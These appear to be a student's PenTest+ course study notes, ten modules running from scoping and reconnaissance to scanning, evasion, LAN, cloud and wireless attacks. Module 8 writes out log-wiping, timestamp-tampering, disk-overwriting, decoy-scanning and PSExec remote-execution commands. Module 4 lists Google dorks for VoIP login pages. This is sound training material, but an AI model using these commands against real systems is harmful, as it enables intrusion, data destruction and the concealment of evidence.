Pentest-16th Dec 2024

Module 1

Governance, Risk, and Compliance

 Governance: Defines the policies and frameworks for managing an
organization’s security.
 Risk: The likelihood of a threat exploiting a vulnerability. Formula: Risk = Threat
x Vulnerability.
 Compliance: Adherence to legal, regulatory, or organizational standards (e.g.,
PCI DSS, GDPR, HIPAA).

Penetration Testing Process

 Steps in PenTesting:
1. Planning and Scoping: Outlining objectives and constraints.
2. Reconnaissance: Gathering intelligence about the target.
3. Scanning: Identifying live hosts, services, and vulnerabilities.
4. Gaining Access: Exploiting vulnerabilities.
5. Maintaining Access: Ensuring persistent access.
6. Covering Tracks: Removing evidence of intrusion.
7. Analysis and Reporting: Summarizing findings and providing
remediation steps.

Pentesting Standards and Frameworks

 OWASP (Open Web Application Security Project): Focuses on web
application security.
 NIST (National Institute of Standards and Technology): Provides
cybersecurity frameworks and guidelines.
 OSSTMM (Open-source Security Testing Methodology Manual):
Methodologies for comprehensive security testing.
  PTES (Penetration Testing Execution Standard): Structured steps for
conducting a PenTest.
 MITRE ATT&CK:
o Adversarial Tactics, Techniques, and Common Knowledge.
o Categories include Initial Access, Persistence, Credential Access, etc.

Key Compliance Requirements

 PCI DSS (Payment Card Industry Data Security Standard):
o Protects credit card data through secure systems and practices.
o Requires vulnerability monitoring, strong access controls, and routine
testing.
 GDPR (General Data Protection Regulation):
o Data privacy framework for EU residents.
o Requires consent for data use, limits data collection, and mandates
breach reporting within 72 hours.
 HIPAA (Health Insurance Portability and Accountability Act): Governs the
security of healthcare data.

Key Databases
 CVE (Common Vulnerabilities and Exposures):
o A list of publicly disclosed vulnerabilities.
o Includes specific product vulnerabilities cataloged by name and
description.
 CWE (Common Weakness Enumeration):
o A database of software-related weaknesses maintained by MITRE.

2. Professionalism and Ethics

 Validation of the Team:
o PenTesters should provide credentials (e.g., certifications), pass
background checks, and have a clean legal history.
  Confidentiality:
o Commitment to protecting proprietary and sensitive information during
testing.
 Legal Considerations:
o Draft contracts with clear terms.
o Address legal conflicts and scenarios before testing.

3. Control Types
 Administrative Controls: Policies, procedures, and guidelines (e.g., least
privilege).
 Physical Controls: Locks, cameras, and access control.
 Technical Controls: Firewalls, encryption, multi-factor authentication.

4. PenTesting Tools
 Reconnaissance:
o Shodan: Internet-connected device scanner.
o theHarvester: Collects emails, subdomains, and metadata.
o Recon-ng: Framework for web reconnaissance.
 Vulnerability Scanning:
o Nessus: Comprehensive vulnerability assessment tool.
o Nikto: Web server vulnerability scanner.
 Exploitation:
o Metasploit: Exploit development framework.
 Reporting:
o Tools to generate comprehensive reports for technical and non-technical
stakeholders.

5. Exam-Ready Definitions
1. Risk Management: Process of identifying, analyzing, and mitigating risks.
 2. Principle of Least Privilege: Users should only have access necessary to
perform their job.
3. Threat: A potential cause of an unwanted event (e.g., malware, natural disaster).
4. Vulnerability: A weakness in a system that could be exploited.
5. Exploit: A method to take advantage of a vulnerability.

Module 2

1. Project Scope and Requirements

Defining the Scope
 Project Scope:
o Defines what is included/excluded during testing.
o Ensures cost-effectiveness and clear objectives.
 In-Scope Assets:
o Examples: IP addresses, domains, APIs, SSIDs, applications.
 Testing Environments:
o LAN, WLAN, cloud resources (SaaS, IaaS, PaaS).
o Physical vs. off-site locations (internal vs. external assets).
Requirements Gathering
 Testing Details:
o Number of pages to test in web applications.
o Roles and permissions to evaluate.
o Cloud-specific requirements, like proper authorization from providers.
 Restrictions:
o Compliance with laws regulating tools, methods, or technologies.
o Export control considerations for specific countries.
2. Rules of Engagement
Key Components
 Stakeholder Communication:
o Clear and open communication to define objectives and address
ambiguities.
 Timeline and Time Management:
o Estimation and adherence to project deadlines.
o Avoid distractions and ensure timely updates.
Types and Strategies
 Assessment Types:
o Compliance-Based: Ensuring regulatory adherence.
o Red Team/Blue Team-Based: Simulated adversarial testing.
o Goal-Based/Objective-Based: Testing focused on specific business
objectives.
 Assessment Strategies:
o Unknown Environment: Black-box testing.
o Partially Known Environment: Gray-box testing.
o Known Environment: White-box testing.
Validation
 Scope Validation:
o Confirm backups and recovery procedures.
o Review in-scope assets, restrictions, and legal considerations.

3. Legal and Confidentiality Considerations

Confidentiality Laws
 Examples of laws ensuring data confidentiality:
o Gramm-Leach-Bliley Act (GLBA): Financial data protection.
o Driver's Privacy Protection Act: Safeguarding driver information.
o HIPAA: Securing healthcare-related data.
Nondisclosure Agreements (NDAs)
 Required to protect proprietary and sensitive information during testing.
Authorization to Attack
 Key Documentation:
o Names of authorized PenTesting entities.
o Specific networks, hosts, and applications included in scope.
o Duration of authorization and proper data handling techniques.

4. Contracts and Agreements

Master Service Agreement (MSA)
 Governs all future engagements with the client.
 Covers:
o Project scope.
o Licensing or permits.
o Insurance requirements.
o Unforeseen additional costs.
Statement of Work (SOW)
 Defines expectations for a specific project.
 Includes:
o Deliverables.
o Responsibilities.
o Payment milestones and schedules.
Service-Level Agreement (SLA)
 Outlines expected service levels and measurement metrics.
 Includes:
o Security access controls.
o Confidential data handling requirements.
o Remedies or penalties for non-compliance.
5. Environmental Considerations
 Physical Locations:
o On-site vs. off-site.
o First-party vs. third-party hosting considerations.
 Legal Restrictions:
o Laws impacting tools, technologies, or PenTesting methods.
o Export controls regulating the transfer of tools or techniques.

Module 3

1. Footprinting and Reconnaissance

Definition and Objectives
 Footprinting: Gathering detailed information about the target system or
organization.
 Reconnaissance:
o Passive: Collecting data without directly interacting with the target (e.g.,
social media, press releases).
o Active: Direct interaction with the target to gather details (e.g., DNS
queries).
Purpose:
 Understand the business operations and technical environment of the target.
 Identify potential attack vectors.

2. Techniques and Tools

General Reconnaissance Techniques
  Social Media Scraping: Gathering employee information, behaviors, and job
roles.
 Job Boards: Analyzing job descriptions for insights into technologies used.
 DNS Information:
o Types of records: MX (Mail Exchange), NS (Name Server), SRV
(Service).
Public Source Code Repositories
 Platforms like GitHub, Bitbucket, and SourceForge.
 Risks include:
o Exposure of private files, sensitive comments, or infrastructure details.
o Potential for code modifications leading to exploitation.
Google Hacking
 Uses advanced operators to search for vulnerabilities:
o site: Searches specific domains.
o filetype: Searches for specific file types (e.g., .pdf, .doc).
o inurl: Searches URLs for keywords.
 Combine operators for targeted searches.
Archived Websites
 Tools and techniques:
o Wayback Machine: Access old versions of websites.
o Cache Search: View recently cached versions of sites.
o Browser Extensions: For viewing cached pages.
Image and Metadata Searches
 Tools:
o Reverse Image Search: Google, TinEye, Bing.
o Google Alerts: Monitors web changes and sends notifications.

3. Website Information
Vulnerability Identification
  Exploitable vulnerabilities:
o XSS (Cross-Site Scripting), SQL Injection, Web Cache Poisoning.
 Tools:
o Nmap, Metasploit, DirBuster.
 robots.txt:
o Used to restrict web crawlers.
o Poorly configured files can reveal sensitive directories.
SSL/TLS Certificates
 Use in reconnaissance:
o Identify SAN (Subject Alternative Names) for subdomains.
o Certificate Transparency Framework: Logs of public certificates reveal
outdated or unused subdomains.
 Validation:
o CRL (Certificate Revocation List): Checks invalidated certificates.
o OCSP (Online Certificate Status Protocol): Real-time certificate
validation.

4. Open-Source Intelligence (OSINT) Tools

Overview
 Used to gather information discreetly without triggering alerts.
 Collects publicly available information.
Metadata Collection
 Metagoofil:
o Extracts metadata (e.g., author, software versions) from documents on
target websites.
o Command examples:
 -d comptia.org: Scans for documents on the domain.
 -t pdf: Searches for PDFs.
 FOCA:
 o GUI-based metadata extractor.
o Works with file types like PDFs, Office documents, SVGs.
o Extractable metadata: Usernames, OS versions, plaintext passwords.
Automation Tools
 theHarvester:
o Collects subdomains, employee names, email addresses, open ports, and
service banners.
o Data sources include search engines (Google, Bing), social media, and
certificates.
 Recon-ng:
o Modular framework for OSINT.
o Features:
 Whois Queries: Identifies key contacts.
 DNS Enumeration: Maps subdomains.
 Social Media Profile Linking.
 Breach Check: Finds if accounts are part of known breaches.
Graphical Tools
 Maltego:
o Visualization of OSINT data in graphs.
o Uses "transforms" to connect entities (e.g., individuals, emails,
addresses).
o Identifies relationships between data points.
Device and IoT Enumeration
 Shodan:
o IoT-specific search engine.
o Finds publicly exposed devices like security cameras, industrial control
systems.
o Useful for identifying organization perimeter defenses and IoT device
vulnerabilities.
5. Use Cases for Tools
 Nslookup/Dig: DNS queries to map domains and subdomains.
 Whois: Identifies domain ownership and administrative contacts.
 Metasploit: Exploits vulnerabilities based on gathered data.
 DirBuster: Discovers hidden directories in web applications.
 Wayback Machine: Retrieves previous versions of a target website.
 Google Alerts: Tracks web changes related to the target.

6. Practical Takeaways
 Importance of Reconnaissance:
o Foundational step for a successful PenTest.
o Provides actionable insights to identify weaknesses and potential entry
points.
 Key Intelligence:
o Subdomains, employee roles, infrastructure details, and exposed data.
 Critical Skills:
o Combining OSINT tools and manual research for comprehensive data
gathering.

Module 4

1. Social Engineering Attacks

Definition
 Social engineering exploits psychological manipulation to deceive individuals into
providing confidential information or performing actions beneficial to an attacker.
Key Methods
1. Pretexting:
o Creating a believable story to gain trust and extract sensitive information.
 2. Elicitation:
o Methods include:
 Requesting: Directly asking for information.
 Interrogation: Pretending to be an authority figure.
 Observation: Monitoring a target’s daily routines.
 Surveys: Collecting data informally.
3. Hoax:
o Presenting fictitious scenarios (e.g., fake antivirus pop-ups).
4. Baiting:
o Leaving infected USB drives for victims to find and use.
5. Phishing:
o Luring victims through deceptive emails to steal credentials.
6. Spearphishing:
o Targeted phishing attack tailored to specific individuals.
7. Pharming:
o Redirecting users to malicious websites disguised as legitimate.
8. SMiShing:
o SMS-based phishing attacks.
9. Vishing:
o Voice phishing through VoIP or phone calls.
10. USB Drop Key Attack:
o Preloading USB drives with malware and planting them in accessible
areas.

2. Advanced Social Engineering Techniques

Tactics to Influence Victims
 Authority: Leveraging positions of power to compel compliance.
 Scarcity: Creating a sense of urgency.
  Fear: Using intimidation to force action.
 Social Proof: Encouraging actions by showing others’ behavior.
 Likeness: Building rapport by mimicking behavior or attitudes.
Redirection and Watering Hole Attacks
 Typosquatting:
o Exploiting user mistakes in typing URLs to redirect to malicious websites.
 Watering Hole Attacks:
o Infecting websites frequently visited by the target to distribute malware.
 Supply Chain Attacks:
o Infecting partner or contractor systems to compromise the target
organization.

3. Physical Attacks
Assessment Tasks
 Taking photos of restricted areas.
 Stealing devices or sensitive documents.
 Testing physical security controls like gates, fences, and mantraps.
Attack Techniques
1. RFID Badge Cloning:
o Duplicating access card data using RFID writers.
2. Tailgating:
o Following an authorized individual into a restricted area without their
knowledge.
3. Piggybacking:
o Gaining access by being knowingly allowed entry by an authorized
individual.
4. Dumpster Diving:
o Retrieving sensitive information from discarded documents or storage
devices.
 5. Shoulder Surfing:
o Observing targets to gain actionable insights (e.g., screen activity or
passwords).

4. Social Engineering Toolkit (SET)

Overview
 A Python-based framework for social engineering PenTests.
 Compatible with Linux, Unix, Windows, and Kali Linux.
Features
 Attacking websites.
 Mass mailing campaigns.
 Spearphishing attack creation.
Spoofing Techniques
1. VoIP Call Spoofing:
o Making calls appear from trusted sources.
o Can be achieved using apps or tools like Asterisk.
2. Voicemail Exploitation:
o Using spoofed numbers to access voicemail systems.
o Default passwords can be a vulnerability.

5. Practical Physical Security Exploits

1. Lock Bypassing:
o Circumventing combination locks, access cards, or biometric scanners.
2. Scaling Fences:
o Identifying and exploiting weak points in physical barriers.
3. Motion Detection Avoidance:
o Finding blind spots in motion sensors or cameras.
6. Tools for Social Engineering and Reconnaissance
SET (Social Engineering Toolkit):
 Helps simulate and execute phishing, baiting, and pretexting attacks.
 Guides users through required inputs like IPs, ports, and URLs.
Google Hacking for VoIP:
 Useful search queries:
o Cisco CallManager: inurl:"ccmuser/logon.asp"
o D-Link Phones: intitle:"D-Link DPH" "web login setting"
o Grandstream Phones: intitle:"Grandstream Device Configuration"
password.

7. Key Attack Scenarios

 Watering Hole Attack:
o Infecting trusted websites frequently accessed by the target.
 Supply Chain Attack:
o Exploiting vulnerabilities in the target's vendors or partners.

Module 5

1. Vulnerability Scanning Process

Understanding Vulnerabilities
 Vulnerability Lifecycle:
o Discover: Recognize potential vulnerabilities.
o Coordinate: Identify and communicate exploitation possibilities.
o Mitigate: Vendors design and implement fixes (patches).
o Manage: Apply and maintain patches.
 o Document: Record findings and actions for reference.
Zero-Day Vulnerabilities
 Exploits vulnerabilities unknown to vendors.
 Risk Gap: Time between patch release and application.

2. Reconnaissance and Scanning

Key Activities
1. Banner Grabbing:
o Collect metadata about network hosts and services.
o Tools: Nmap (nmap -sV <target IP> -p <port>), Netcat, Curl.
2. Network Mapping:
o Identifies:
 MAC and IP addresses.
 Services, devices, subnets, and topology.
o Output helps in choosing attack strategies.
3. Scanning:
o General Purpose Scanners:
 OpenVAS: Free, open-source tool.
 Nessus: Commercially supported scanner.
 Nmap: Network discovery and vulnerability scanning.
o Scanning Goals:
 Detect weak encryption/authentication protocols.
 Identify compliance violations.
o Types of Scans:
 Nonintrusive: Passive reporting of vulnerabilities.
 Intrusive: Actively tests for exploitation but risks system damage.

3. Detecting Defenses
Load Balancers
 Devices that distribute traffic to optimize performance.
 Detection tools: lbd app (Kali Linux).
Firewalls
1. Web Application Firewall (WAF):
o Guards against XSS and SQL injection attacks.
o Indicators:
 Cookies in HTTP headers.
 Header alterations.
 Response titles like <title>myDefender blocked your request</title>.
2. Testing Firewalls:
o Use custom packets to test:
 Permit Rules: Allowed packets.
 Deny Rules: Blocked packets.
o Firewalking: Combines traceroute and port scanning to map internal
network details.
Antivirus Evasion
 Techniques:
o Metamorphic Malware: Changes structure to evade signature detection.
o Obfuscation: Using tools like ObfuscatedEmpire.
o Fileless Malware: Executes via OS-level processes, avoiding detection.

4. Advanced Tools and Techniques

OpenVAS and Censys
 OpenVAS: Lists vulnerabilities with CVSS scores and CVE numbers.
 Censys: Analyzes attack surfaces and identifies exposed services and ports.
Packet Crafting
 Custom packets used to:
 o Test firewall rules.
o Evade intrusion detection systems (IDS).
o Cause denial of service (DoS).
 Tools: Yersinia, Bit-Twist.
Web Application Scanning
1. Tools:
o OWASP ZAP, Metasploit Pro, Arachni, Skipfish, Grabber, Wapiti.
2. Common Tests:
o SQL Injection: Directly scan SQL servers (TCP 1433, UDP 1434).
o Vulnerabilities: On standard (TCP 80, 443) and non-standard ports.
SQLmap
 Open-source tool for testing SQL injection vulnerabilities.
SSL/TLS Vulnerabilities
 Examples:
o Logjam: Weakens encryption strength.
o FREAK: Exploits RSA-export keys.
o POODLE: Targets SSL 3.0 padding.
Nikto
 Detects:
o Missing security headers (e.g., X-Frame-Options for clickjacking).
o Dangerous files and CGI scripts.

5. Planning Vulnerability Scans

Considerations
1. Scope:
o Define timeframes, bandwidth limits, and system fragility.
2. Post-Scan Validation:
o Verify vulnerabilities through exploitation.
 o Tools: Metasploit, manual testing.

6. Practical Vulnerability Analysis

1. Testing Databases:
o Focus on private networks or misconfigured servers.
o Use SQL commands to test for illegal inputs.
2. SSL/TLS Testing:
o Check for deprecated cryptographic standards.
3. Automated Tools:
o Use GitHub scripts (e.g., Wafw00f, WAFNinja) for advanced scans.

Module 6

1. Vulnerability Scanning and Reconnaissance

Discovery Scans
 Definition: A ping sweep to identify live hosts on a network.
 Techniques:
o TCP SYN Ping, TCP ACK Ping.
o UDP Ping, ARP Scan, IP Protocol Ping.
Port Scanning
 Identifies open and listening ports on live hosts.
o Examples: Port 25 (SMTP), Port 53 (DNS), Port 80 (HTTP).
 Types of Scans:
o Full Scan (TCP Connect):
 Uses a complete three-way handshake.
 Produces detailed results but is easily detected.
 o Stealth Scans:
 Avoid detection by skipping the full handshake.
 Types: TCP SYN (half-open), FIN, NULL, XMAS Tree.
Web Application Scanning
 Includes crawling, scraping, and discovering assets.
 Credentialed Scan: Uses credentials for deeper insights.
 Non-Credentialed Scan: Limited access, finds only surface vulnerabilities.
 Tools:
o Acunetix, Qualys, Netsparker (commercial).
o Open-source scanners in Kali Linux.

2. Automated Vulnerability Scanning

Techniques
 Static Application Security Testing (SAST):
o Early lifecycle testing of code for vulnerabilities.
 Dynamic Application Security Testing (DAST):
o Post-deployment testing for live vulnerabilities.
 SCAP (Security Content Automation Protocol):
o A US standard for ensuring compliance and monitoring vulnerabilities.
Benefits
 Continuously updates vulnerability databases.
 Reduces manual effort and improves consistency.

3. Network Traffic Analysis

Sniffing Traffic
 Tools: Wireshark for passive traffic capture.
 Captured Data:
o Cleartext data: Credentials, messages, hostnames.
 o Encrypted data: Source/destination addresses, SSIDs, handshakes.
MAC and ARP Analysis
 Tools: Nessus, Nmap (nmap -PR -sn <target>), Arping (Kali Linux).
 Applications:
o Discover hosts.
o Launch ARP poisoning attacks.

4. Wireless Network Security

Wardriving
 Searching for open wireless access points (WAPs) using tools:
o Aircrack-ng, Kismet, Wifite.
 Use packet analysis tools to gather and save WAP data.
WiGLE (Wireless Geographic Logging Engine)
 Purpose: OSINT tool for mapping WAPs.
 Features:
o Enter location and date ranges.
o Map access points and analyze their data.
Antenna Types for PenTesting
 Directional: Focused signal in one direction.
 Omni-Directional: Broadcasts in all directions.
 Parabolic: Focused beam like a laser.
Signal Amplification
 Measured in decibels per isotropic (dBi).
 Improves Signal-to-Noise Ratio (SNR) for better penetration test results.

5. Evaluating APIs
Importance
 APIs exchange data between systems securely.
  Testing targets:
o Exposed API keys.
o Vulnerabilities in API interactions.

6. Vulnerability Scanning Tools

1. Nessus:
o Scans enterprise or home networks.
o Supports policy creation for future scans.
o Validates network segmentation (e.g., VLANs, subnets).
2. SQLmap:
o Finds and exploits SQL injection vulnerabilities.
3. Nikto:
o Tests web servers for:
 Missing headers (e.g., X-Frame-Options for clickjacking).
 Dangerous files or CGIs.

7. Wireless Access Point (WAP) Security

Testing Objectives
 Discover open or unsecured WAPs.
 Evaluate access point vulnerabilities to prevent unauthorized access.
Key Findings
 Weak encryption or default configurations.
 Unauthorized access opportunities.

8. Practical Considerations
Full vs. Stealth Scans
 Full scans are thorough but noisy.
 Stealth scans minimize detection risk but may provide less detail.
Segmentation
 Network segmentation isolates systems to minimize lateral movement.
 Ensures compliance and reduces attack surface.

Module 7

1. Nmap Scanning and Scripting

Capabilities of Nmap
 Key Features:
o Host and service discovery.
o OS fingerprinting.
o Vulnerable host detection.
o MAC address gathering.
 Scanning Performance:
o Use timing flags: -T0 (slowest) to -T5 (fastest).
o Adjust timing for rate-limited networks to avoid detection.
TCP and UDP Scans
 TCP Scans:
o TCP ACK Scan: Bypass firewalls by sending ACK flags.
o Full Scan (TCP Connect): Establishes a full handshake but is noisy.
o Christmas Tree Scan: Uses FIN, PSH, and URG flags.
 UDP Scans:
o Slower and harder to detect responses.
o Often skipped in favor of TCP scans.
Nmap Scripting Engine (NSE)
 Purpose:
 o Automates tasks like malware detection, network discovery, and
vulnerability assessment.
 Categories:
o Malware: Detects Trojans and backdoors.
o Discovery: Identifies hosts and services.
o Vulnerabilities: Exploitation commands.
 Usage:
o Single script: nmap --script <script-name>.
o Multiple scripts: Use commas or wildcards to specify categories.

2. Network Enumeration
Mapping the Network
 Discovery Methods:
o Ping Scans: ICMP echo requests.
o TCP Scans: Open ports and services.
o OS Footprinting: Detect OS types.
 Host Discovery Options:
o Skip discovery: -Pn.
o Network discovery only: -sn.
o Script-only without scans: Combine -Pn and -sn.
OS Fingerprinting
 Uses active or passive methods:
o Active: Sends probes and analyzes responses.
o Passive: Captures packets with sniffing tools like Wireshark.
 Key indicators:
o DF bit, Window Size (WS), and Time to Live (TTL) values.

3. Analyzing Scans
Output Formats
 Interactive: Default, human-readable.
 XML (-oX): Flexible, machine-readable.
 Grepable (-oG): For command-line parsing.
 Normal (-oN): Save scan results to a text file.
Zenmap
 GUI companion for Nmap.
 Visualizes network topology and assists in attack planning.

4. DNS and Web Server Analysis

DNS Footprinting
 Reveals additional targets and network structure.
 Vulnerabilities:
o Zone Transfers: Obtain resource records (e.g., Type A, MX).
o DNS Cache Poisoning: Corrupts recursive server caches.
Web Server Testing
 Methods:
o Manually inspect source code for comments or exposed data.
o Review logs for unauthorized access.
o Intercept traffic using a proxy.
Burp Suite
 Features:
o Acts as a local proxy to capture HTTP/HTTPS traffic.
o Identifies vulnerabilities (e.g., weak authentication, cryptographic flaws).
 Dashboard:
o Lists details of discovered vulnerabilities for deeper analysis.

5. Vulnerability Testing
Key Scanning Techniques
 Service Detection: Use scripts like dns-service-discovery.
 Zone Transfer Exploits:
o Use Nmap scripts to request and analyze zone records.
o dns-zone-transfer for exposed records.
 Dynamic DNS Updates:
o Test updates without authentication using scripts like dns-update.
Web Application Scanning
 Use proxies and web crawlers to intercept traffic and analyze vulnerabilities.

6. Questions to Address During Reconnaissance

1. Who are the key targets?
o Identify hosts and devices worth pursuing.
2. What is the target's location?
o Establish proximity and accessibility.
3. What is the goal?
o Define specific objectives for data extraction or exploitation.
4. When and how to attack?
o Plan timing and methods to avoid detection.

7. Practical Insights
Nmap Utility
 Flexible and comprehensive for PenTesting tasks.
 Supports extensive customization via scripts and output formats.
Zenmap
 Enhances understanding of network environments through visual mapping.
 Aids in strategizing attacks and testing results.
DNS Risks
  Misconfigurations in zone files or caching can expose critical information.
 Use scripts like dns-zone-transfer or dns-update to evaluate vulnerabilities.

Module 8

1. Evading Detection
Flying Under the Radar
 Stealth Techniques with Nmap:
o Fragmentation: Break probes into smaller packets.
o Randomizing Hosts: Change scanning order.
o Decoys:
 Generate fake packets to disguise the attacker.
 Command: nmap -D [decoy1, decoy2, etc.] <target> or -D RND:3.
o Fake Source Addresses:
 Spoof source IP or MAC addresses.
 Command: nmap --spoof-mac [random/vendor-specific].
 Slowing Scans:
o Adjust timing with -T options (e.g., -T0 for stealth).
o Avoid IDS detection by reducing scan aggressiveness.

Bypassing Network Access Control (NAC)

 Technique:
o Gain access via an authenticated device.
o Use rogue WAPs to relay malicious traffic.
Living off the Land (LoTL)
 Definition:
 o Attacks that leverage built-in OS tools or admin utilities, avoiding external
malware.
 Examples:
o PowerShell (PS).
o Windows Management Instrumentation (WMI).
o Mimikatz (credential theft).
o VBScript.

2. Covering Tracks
Log and Entry Manipulation
 Clearing Logs:
o Windows: Use Metasploit’s clearev or clear specific logs via CLI.
o Linux: Commands to delete specific logs (e.g., echo "" > ~/.bash_history).
 Modifying Logs:
o Alter log entries to mislead investigators.
o Example: Modify login events in Windows Security logs.
 Timestamp Alteration:
o Use tools like TimeStomp in Metasploit to change file MACE (Modified,
Accessed, Created, Entry) timestamps.
Data Shredding
 Commands:
o Linux: shred for file overwriting.
o Windows: Overwrite volumes with format d: /fs:NTFS /p:1.

3. Concealing Information
Steganography
 Definition:
o Embedding hidden data within carrier files (images, audio, text).
 Tools:
 o Steghide: Hides payloads in images/audio.
o Snow: Hides data in text whitespace.
o Coagula/Sonic Visualizer:
 Convert text into an image, then embed it into a .wav file.
 Reveal text with audio spectrogram analysis.
NTFS Alternate Data Streams
 Allows hidden data to link to visible files.
 Used to conceal tools or sensitive data on compromised systems.

4. Data Exfiltration
Definition
 Unauthorized transfer of data from a secure system to an external location.
 Methods:
o Phishing or social engineering attacks.
o Using insecure storage (e.g., USB drives).
o Fileless malware exploiting PowerShell or cloud misconfigurations.

5. Establishing Covert Channels

Remote Management Tools
1. Secure Shell (SSH):
o Provides encrypted remote management.
o Nmap can detect SSH server vulnerabilities.
2. WinRM:
o Windows Remote Management via CLI or PowerShell.
o Command: winrm quickconfig to enable service.
3. PSExec:
o Issues remote commands via SMB without pre-installed clients.
o Example: PSExec \\192.168.1.50 -s "C:\malicious.exe".
Network Utilities
1. Netcat:
o CLI utility for creating TCP/UDP connections.
o Features:
 Proxy or relay.
 File transfers.
 Launching backdoor shells.
o Syntax: nc [options] [target] [port].
2. Ncat:
o Advanced version of Netcat.
o Modes:
 Client: Initiates connections.
 Server: Listens for connections.
o Built into Nmap with additional features for encrypted communication.

6. Using Proxies and ProxyChains

Proxies
 Mediate communications between clients and servers.
 Provide caching, filtering, and location concealment.
ProxyChains4
 CLI tool for tunneling traffic through proxies.
 Features:
o Integrates with TOR for anonymization.
o Encrypts traffic within the tunnel.

7. Practical Techniques
Preventing Detection
 Use fragmentation, decoys, and randomization to avoid IDS detection.
  Reduce scan aggressiveness with -T switches.
Using Steganography
 Hide sensitive data in media files or whitespace.
Remote Management
 Exploit tools like WinRM and PSExec for lateral movement.

Module 9

1. Enumerating Hosts
Discovering Services
 Key Ports and Protocols:
o SMTP (Port 25): Extract email addresses, enumerate server info, search
for open relays.
o DNS (Port 53): Perform zone transfers, discover subdomains.
o SMB (Port 139): Retrieve directory information, list, and transfer files.
Enumerating Shares
 Microsoft Hosts:
o Use SMB protocol via Ports 139 or 445.
o Tools: Metasploit, ShareEnum (Sysinternals).
 Linux/Unix Hosts:
o Use NFS (Network File System) via Port 2049.
Website Enumeration
 Nmap Scripts:
o Example: nmap --script=http-enum <target> to discover web application
resources.
 Non-Standard Ports:
o Scan all ports to identify non-standard service bindings.
Active Directory (AD) Enumeration
  PowerShell Cmdlets:
o Get-NetDomain: Get current domain.
o Get-NetLoggedon: List logged-on users.
o Get-NetGroupMember: Retrieve domain group members.
Linux Enumeration
 Metasploit Modules:
o post/linux/enum_system: Enumerates configurations, networks, and users.
 Bash Commands:
o finger: Displays user information.
o cat /etc/passwd: Lists system users.

2. LAN Protocol Exploitation

VLAN Hopping
 Techniques:
o MAC Overflow (Macof Attack): Overflows switch MAC tables to turn
them into hubs.
o Trunk Port Misuse: Configure attacker’s interface as a trunk port to
access all VLANs.
On-Path Attacks
 Malicious interception of communication paths.
 Examples:
o SSL/TLS Stripping: Downgrades secure HTTPS connections.
o Wi-Fi Pineapple: Acts as a rogue access point.
Spoofing and Poisoning
 Types:
o DNS Cache Poisoning: Redirects traffic to malicious domains.
o ARP Spoofing: Misleads devices about the correct MAC address for a
given IP.
o LLMNR/NBT-NS Poisoning:
  Tools: Responder to intercept and respond to network address
queries.
Password Hash Attacks
 Pass the Hash: Uses stolen hashes for authentication without cracking.
 Kerberoasting:
o Extracts service account hashes from AD.
o Cracks offline to retrieve plaintext passwords.
Exploit Chaining
 Combines multiple exploits for a comprehensive attack.
 Examples:
o Compromising a network, planting a device, and escalating privileges.

3. Exploit Tools
Metasploit Framework (MSF)
 Modules:
o Exploits, Payloads, and Auxiliary.
 Popular Payload:
o Meterpreter: Interactive payload for post-exploitation.
 Options:
o RHOSTS, LHOST, and RPORT for targeting.
Other Tools
 Impacket: Collection of Windows PenTesting tools.
 Responder: Poison NetBIOS, LLMNR, and MDNS requests.
 mitm6: IPv6 DNS hijacking.
 Exploit DB: Searchable database of public exploits.

4. Cloud Exploitation
Cloud Asset Risks
  Configuration Vulnerabilities:
o Misconfigured permissions, storage, or container settings.
o Embedded malware in container images.
 IAM Risks:
o Privileged or shared accounts increase exposure.
Cloud Attacks
 Common Types:
o Malware injection, side-channel, direct-to-origin attacks.
 Privilege Escalation:
o Weak process permissions or unpatched vulnerabilities.
Cloud PenTesting Tools
 ScoutSuite:
o Multicloud audit tool.
 Prowler:
o AWS-specific audit tool.
 Pacu:
o AWS exploitation framework.
 Cloud Custodian:
o Policy-based resource management.

5. Denial of Service (DoS)

Effects
 Consumes system resources, locks out legitimate users.
 Attack Types:
o Packet flood, Slowloris, HTTP flood, DNS amplification.
 Tools:
o Slowloris script, R-U-Dead-Yet (RUDY), Hyenae.
6. Key Takeaways
 LAN and Cloud:
o Secure VLAN configurations to prevent hopping.
o Regularly audit cloud permissions and containers.
 Tools:
o Leverage Nmap, Metasploit, and specialized cloud tools for thorough
testing.

Module 10

1. Wireless Attacks
Securing Wireless Transmissions
 Vulnerability:
o Wireless transmissions are susceptible to interception since they use
unbounded radio waves.
o Risk includes sniffing sensitive data like login credentials and credit card
numbers.
Encryption Standards:
 WPA2:
o Uses AES encryption with CCMP for secure transmissions.
 WPA3:
o Enhances WPA2 with features like forward secrecy and better protection
against brute force attacks.
Common Wireless Attacks:
1. Eavesdropping:
o Sniff unencrypted data from public/open Wi-Fi.
o Obtain client MAC addresses for spoofing.
2. Deauthentication (Deauth) Attack:
 o Boots clients from an AP to force reauthentication.
o Tools:
 Airodump-ng: Captures handshake packets.
 Aireplay-ng: Executes deauth attacks.
3. Signal Jamming:
o Disrupts Wi-Fi signals via physical or software-based jammers.
o Example tool: Wi-Fi jammer (Python-based).
4. WPA Cracking:
o Dictionary attacks or KRACK (Key Reinstallation Attack) exploits
weaknesses in WPA2.
WPS PIN Attacks:
 Methods:
o Exploit "push-to-connect" features.
o Brute force WPS PINs using tools like Reaver (included in Kali Linux).

2. Wireless Tools
Aircrack-ng Suite
 Airmon-ng:
o Enables and disables monitor mode on wireless interfaces.
 Airodump-ng:
o Captures 802.11 frames, identifies BSSID and client MAC addresses.
 Aireplay-ng:
o Injects packets to perform attacks (e.g., deauthentication).
Kismet
 Features:
o Packet capture, wireless IDS, and network discovery.
o Works with software-defined radios (SDRs).
o Saves captured handshakes for password cracking.
Wifite2
 Capabilities:
o Wireless auditing tool for WLANs.
o Identifies networks advertising WPS and encryption types.
o Captures handshakes and prioritizes weaker targets.
Fern
 Purpose:
o Tests wireless networks, recovers WEP/WPA/WPA2 keys.
o Methods: Brute force, dictionary attacks, replay, session hijacking.
 Dependencies:
o Python, Aircrack-ng, Macchanger.
EAPHammer
 Features:
o Launch evil twin attacks using a rogue AP.
o Steal RADIUS credentials (e.g., WPA-EAP, WPA2-EAP).
o Perform captive portal attacks to capture credentials.
MDK4
 Modules:
o Mode a: Authentication DoS.
o Mode b: Creates fake wireless networks.
o Mode p: Probes and brute forces hidden SSIDs.
o Mode d: Disconnects and disassociates all clients from an AP.

3. Wireless Testing Steps

1. Preparation:
o Scan all channels to locate networks.
o Grade networks by signal strength.
 o Gather information about encryption types, WPS status, and hidden
SSIDs.
2. Tool Setup:
o Ensure wireless card supports monitor mode and packet injection.
o Choose appropriate antenna based on distance and coverage needs.

4. Bluetooth PenTesting
Spooftooph:
 Clones or spoofs Bluetooth devices.
